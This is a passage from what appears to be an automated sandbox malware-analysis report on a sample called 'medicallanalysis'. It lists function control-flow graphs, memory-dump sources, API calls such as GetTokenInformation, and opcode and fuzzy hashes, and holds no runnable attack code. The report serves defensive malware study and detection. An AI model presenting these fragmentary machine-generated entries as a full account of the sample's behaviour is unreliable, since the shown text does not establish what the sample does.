                                                                                                                                                                                                                                                                                                              control_flow_graph 752 5373408-53736ec 802 53739e6-53739f0 752->802 803 53736f2-53736fb 752->803 804 5373701-537394a 803->804 805 53739fa-5373a23 803->805 867 53739bc-53739d1 804->867 868 537394c-5373962 804->868 812 5373a25-5373a2f 805->812 813 5373a31 805->813 814 5373a36-5373a38 812->814 813->814 816 5373a47-5373a49 814->816 817 5373a3a-5373a45 814->817 818 5373a57 816->818 819 5373a4b-5373a55 816->819 817->816 820 5373a5c-5373a5e 818->820 819->820 823 5373a97-5373a9b 820->823 824 5373a60-5373a69 820->824 828 5373a70-5373a83 824->828 829 5373a6b-5373a6f 824->829 832 5373a85-5373a96 828->832 833 5373a9c-5373adc 828->833 841 5373ade-5373ae8 833->841 842 5373aea 833->842 844 5373aef-5373af1 841->844 842->844 845 5373af3-5373b13 844->845 846 5373b1f-5373b25 844->846 851 5373b1b-5373b1d 845->851 848 5373b32-5373b3a 846->848 851->848 867->802 871 5373964-5373976 868->871 872 53739ab-53739ba 868->872 871->872 875 5373978-53739a4 871->875 872->867 872->868 875->872
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: fcq$ fcq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-3114753931
                                                                                                                                                                                                                                                                                                              • Opcode ID: 4b17fda9550d773179a7158b35bc388d5b8ec9c2e723cbefb485d0a37650082e
                                                                                                                                                                                                                                                                                                              • Instruction ID: 70314e6d6dc3dc11858cebe2d1f87bc244f3f82e54f88a3d19cc8c5dbad1d2bf
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b17fda9550d773179a7158b35bc388d5b8ec9c2e723cbefb485d0a37650082e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09F1D7357006099FEB09AB60D894B7E77AFEBC9701F108115E9469B389CF75AC439B82
                                                                                                                                                                                                                                                                                                              Function 05372018 Relevance: 2.8, Strings: 2, Instructions: 323COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 880 5372018-5372031 881 5372037-537203b 880->881 882 5372288-53722ad 880->882 883 53722b4-53722f0 881->883 884 5372041-537204c 881->884 882->883 910 53722f2-5372305 883->910 911 537227c-5372285 883->911 885 537204e-537205a 884->885 886 537205c 884->886 888 537205f-537206a 885->888 886->888 895 53720f1-53720fc 888->895 896 5372070-5372076 888->896 897 53720fe-537210a 895->897 898 537210c 895->898 899 5372086 896->899 900 5372078-5372084 896->900 902 537210f-537211a 897->902 898->902 903 5372089-537208b 899->903 900->903 918 537217f-537218a 902->918 919 537211c-5372135 902->919 907 537208f-5372093 903->907 908 537208d 903->908 913 5372095-53720a1 907->913 914 53720a3 907->914 912 53720b1-53720b5 908->912 920 5372307-537230a 910->920 921 5372315-5372325 910->921 916 53720b7-53720c3 912->916 917 53720c5 912->917 915 53720a6-53720af 913->915 914->915 915->912 923 53720c8-53720ee 916->923 917->923 924 537218c-5372198 918->924 925 537219a 918->925 949 5372137-5372143 919->949 950 5372145 919->950 926 5372310 920->926 927 53723aa-53723b5 920->927 928 5372327 921->928 929 5372331-5372352 921->929 930 537219d-53721a8 924->930 925->930 934 53723c1-53723c6 926->934 940 53723b7-53723bb 927->940 941 5372354-5372364 927->941 928->929 929->940 929->941 943 53721ae-53721ca 930->943 944 537223d-5372245 930->944 940->934 946 5372366 941->946 947 5372370-537237d 941->947 968 53721cc-53721d8 943->968 969 53721da 943->969 952 5372247-5372249 944->952 953 5372253-5372274 944->953 946->947 961 5372390-5372398 947->961 962 537237f-537238e 947->962 951 5372148-537217c 949->951 950->951 952->953 953->911 965 537239d-53723a9 961->965 962->927 962->961 970 53721dd-53721df 968->970 969->970 974 53721e3-53721e7 970->974 975 53721e1 970->975 976 53721f7 974->976 977 53721e9-53721f5 974->977 978 5372205-537223a 975->978 979 53721fa-5372203 976->979 977->979 979->978
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: (bq$(bq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-4224401849
                                                                                                                                                                                                                                                                                                              • Opcode ID: f81dfa8a474eec4cf57695818439110364724966295b42d1d577b626a82cb59e
                                                                                                                                                                                                                                                                                                              • Instruction ID: e471e2ae630adec499bc1cd99425866e083b5f87063d57c9b524b72f01e29c76
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f81dfa8a474eec4cf57695818439110364724966295b42d1d577b626a82cb59e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91B17F35B002098FCB24DB6DC494A6FBBF6FF88250B10842AE406DB355DB79DD45CBA5
                                                                                                                                                                                                                                                                                                              Function 00980D68 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 1815 980d68-980df4 GetTokenInformation 1817 980dfd-980e25 1815->1817 1818 980df6-980dfc 1815->1818 1818->1817
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,?,?,?,?), ref: 00980DE7
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2247076065.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_980000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: InformationToken
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 4114910276-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: de47b668eb5badf689a2d8304b2f86cdc114d2652cdde69691743e06bcf48da0
                                                                                                                                                                                                                                                                                                              • Instruction ID: dee62475a97d36db36564ca4d4f9c8c2458690c6e2626241aa5e3541842cfbe3
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de47b668eb5badf689a2d8304b2f86cdc114d2652cdde69691743e06bcf48da0
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5521E2B6901359DFCB10DF9AC984ADEBBF5FB48320F10842AE958A7350D774A944CBA4
                                                                                                                                                                                                                                                                                                              Function 053719FB Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: pOq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-4216562466
                                                                                                                                                                                                                                                                                                              • Opcode ID: 64c3077f3956f05ca8a02b87a08d2d73ddf48fd1f0cf0945fd22621b580bec60
                                                                                                                                                                                                                                                                                                              • Instruction ID: ffd19a6993d9a1c5842a7e0f36a1c61a7ea434e311a52c0db6036ceedf1a8a4a
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64c3077f3956f05ca8a02b87a08d2d73ddf48fd1f0cf0945fd22621b580bec60
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8511AD32B407055BDB15BA7D9896A2F76DBEBC8760B448439E41ACB358EE78DC4287C0
                                                                                                                                                                                                                                                                                                              Function 00980E31 Relevance: 1.3, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2247076065.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_980000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: a925ab7693a6fb3796c6acfe0eb27c99e912c04b8ec2c7b47d2a216fd5498ef1
                                                                                                                                                                                                                                                                                                              • Instruction ID: 2f0a6da46ad7dae4eec0da45db67027a7850ef95d88778fd6221fbe8b1458779
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a925ab7693a6fb3796c6acfe0eb27c99e912c04b8ec2c7b47d2a216fd5498ef1
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED1134B28002498FCB20DF9AC545BDEBBF4AB88320F208869D559A7351C779A944CFA4
                                                                                                                                                                                                                                                                                                              Function 00980E38 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2247076065.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_980000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 21224ef621da898a473e1e2fabf2571fa34fea4ae09ef66a09907559526f22a4
                                                                                                                                                                                                                                                                                                              • Instruction ID: b98dd3a793c6d202d9fd4cb96fb32706c7c785d25ea73ef086f4943e453a68d8
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21224ef621da898a473e1e2fabf2571fa34fea4ae09ef66a09907559526f22a4
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D81113B1800249CFCB20DF9AC544BDEBBF4EB88324F20886AD558A7351C778A944CFA5
                                                                                                                                                                                                                                                                                                              Function 05372490 Relevance: .6, Instructions: 607COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: c9338128f4c1e714d05a57e9f8b16eb05a40251b63bd1cdf9daa2058a84b4528
                                                                                                                                                                                                                                                                                                              • Instruction ID: 0417c1d12caf36dd11779893e74e9b75b96e2f3265c1163fbc9018dad811c85a
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9338128f4c1e714d05a57e9f8b16eb05a40251b63bd1cdf9daa2058a84b4528
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32126334750718EBEB062778C95472E69DFABCCB00F10841AA445B37ECCE76DC8657A6
                                                                                                                                                                                                                                                                                                              Function 053747B5 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: a0a248abac4fbf819842cbaa9610f4f56f3e9d7ca432f4f47a5887bb2e1f5e55
                                                                                                                                                                                                                                                                                                              • Instruction ID: 793459ecd91b7e2f8f62899fe4e75747df9780cf31d39aa44f6c0833a414480e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0a248abac4fbf819842cbaa9610f4f56f3e9d7ca432f4f47a5887bb2e1f5e55
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C619335B0061A9FDB14DF78C9906AEB7F6BF89700F108128D849D7384EB35EC428B92
                                                                                                                                                                                                                                                                                                              Function 05374A07 Relevance: .2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: deab387d4a7c501cbb220821212da2253c5dd8e98a87f12738d9f92ec0c00c0c
                                                                                                                                                                                                                                                                                                              • Instruction ID: 3b0bf58e8f3fc9bef2008fb243e11197b62a19a321fc876020bb3f13777cda15
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: deab387d4a7c501cbb220821212da2253c5dd8e98a87f12738d9f92ec0c00c0c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD61D030700704AFDB25EB24C881B2EBBA7EB81314F11846DD58A5F6A5DB76FC42CB95
                                                                                                                                                                                                                                                                                                              Function 05370DA0 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: b70ee045dd91d36bd5d85399ad53bd8972901591f6577ec8e66af7d468db1058
                                                                                                                                                                                                                                                                                                              • Instruction ID: 09723fa914bbb151365c7a1c3484a70265cd3dda93a808052fe025c8fbe4fdb1
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b70ee045dd91d36bd5d85399ad53bd8972901591f6577ec8e66af7d468db1058
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77512771E0021CCFDB28CFA9D998B9EBBF5BF48310F148429E419A7244DB789946CF90
                                                                                                                                                                                                                                                                                                              Function 0537247F Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: b9297c0ecaf9f6af616805ec8109541ddb440c7a4e8c76944d7c6cc2ac58e9da
                                                                                                                                                                                                                                                                                                              • Instruction ID: 7d64db29df493406c0327578c5085ada81a36f7243d0cd17b610a94bbb575821
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9297c0ecaf9f6af616805ec8109541ddb440c7a4e8c76944d7c6cc2ac58e9da
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E241E874B00718EFDB056B78C94475E7AEFEB8C710F10441AE509A3398DA75CC868B99
                                                                                                                                                                                                                                                                                                              Function 05370D94 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 876aaaec1896ce81a8f50f7dfc37051a2c4729ecac4123782541d643d31ae505
                                                                                                                                                                                                                                                                                                              • Instruction ID: c881022dacf2f8a67cef248846c8485b94bf85df45fa4ba374ccb4137930c8d2
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 876aaaec1896ce81a8f50f7dfc37051a2c4729ecac4123782541d643d31ae505
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94514871D0021CDFDB28CFA9C998B9EBBF5BF48704F148429E419AB240DB789946CF50
                                                                                                                                                                                                                                                                                                              Function 05373000 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: d77c1293df606d433fbd7210d757742a3faee32a2d56c6570fdc0d21e639d47f
                                                                                                                                                                                                                                                                                                              • Instruction ID: a1771c235a834128f547bfde7b9ed6b5e10484d5838ffb12f9097376701d6be7
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d77c1293df606d433fbd7210d757742a3faee32a2d56c6570fdc0d21e639d47f
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36514771E0421CCFCB24DFA9D98479EBBF6BF48300F148829D45AA7350DB799846CB81
                                                                                                                                                                                                                                                                                                              Function 05372FF7 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: fedf8c798f3fc8b67359a717cd6a47ff0f25369db6853bdb3b95e9704e7b3e5d
                                                                                                                                                                                                                                                                                                              • Instruction ID: cbda6a4528a2d158e6bcbeb2f21ccaed0841a3ee6d41fc0dc6a7767630e815b9
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fedf8c798f3fc8b67359a717cd6a47ff0f25369db6853bdb3b95e9704e7b3e5d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD4156B1E0425CCFCB20CFA9C98479EBBF5BF48700F148829E44AEB250DB789945CB81
                                                                                                                                                                                                                                                                                                              Function 05373A10 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 93e0dd209f4e3364c35bda6249aa280843c0bad84aa249b9f42efb839caa9e0a
                                                                                                                                                                                                                                                                                                              • Instruction ID: c37b9ac4db201e708cb51eb8fe86a4dfdb0ab8abd618a00eca837d9d0b3a25e9
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93e0dd209f4e3364c35bda6249aa280843c0bad84aa249b9f42efb839caa9e0a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5314631F0A6199FDB24AB38D4117BA3BEDEF44324F04887AD44ACB241DA7EC805D791
                                                                                                                                                                                                                                                                                                              Function 05371818 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: f1484b3afafc5166367a158168726d03fd51f85764bb34f754254a4aff70eeac
                                                                                                                                                                                                                                                                                                              • Instruction ID: 2741d959d006b9cb920738fc9f261e9305c54e6792f08cd44fa4585cf60ab718
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1484b3afafc5166367a158168726d03fd51f85764bb34f754254a4aff70eeac
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C141E3B1D0124CDBCB14DFAAD554ADEFBF6AF88314F14802AE415B7250DB35A946CF90
                                                                                                                                                                                                                                                                                                              Function 053732C0 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: ffb74605271eb2f9ef6c07e03380d6b32266ece2639f2ed26f89c0f101dc736f
                                                                                                                                                                                                                                                                                                              • Instruction ID: ee3e461214ba3479aeb116a444c8e43fc135363dec4f58b5ab95c51d5cb6367b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffb74605271eb2f9ef6c07e03380d6b32266ece2639f2ed26f89c0f101dc736f
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00311A31E0470ECBDB25CFE5C54459EBBB2FF89300F10891AE816BB644DBB46946CB50
                                                                                                                                                                                                                                                                                                              Function 0537180F Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 0e12e753a3e8c0886001d2832d49e2b1464c69d865b5e6d56f3bceb7f12d3d1d
                                                                                                                                                                                                                                                                                                              • Instruction ID: 7ef09175d1f7a32508de820721a4d15db4bd85da130654824f115dbf5457ecda
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e12e753a3e8c0886001d2832d49e2b1464c69d865b5e6d56f3bceb7f12d3d1d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D03102B1D0124C9BDB24CFAAD594BDEFBF6AF48304F14802AE459B7250EB749946CF50
                                                                                                                                                                                                                                                                                                              Function 053731B0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2248816888.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_5370000_medicallanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3c3f30c9c1d3cfc254ad1bf09607dd1850a9b0505670b3613e682de42ac2bbe3
                                                                                                                                                                                                                                                                                                              • Instruction ID: ee4adfdefcce40f2d81734aa8ebbd79ff37a86fc07a9e94f0508e0c638c8566e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c3f30c9c1d3cfc254ad1bf09607dd1850a9b0505670b3613e682de42ac2bbe3
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1931E2B1D0125CDFDB24DFA9D994BDEBBB9BF48310F24882AE405B7240CB75A945CB90
                                                                                                                                                                                                                                                                                                              Function 053731A4 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
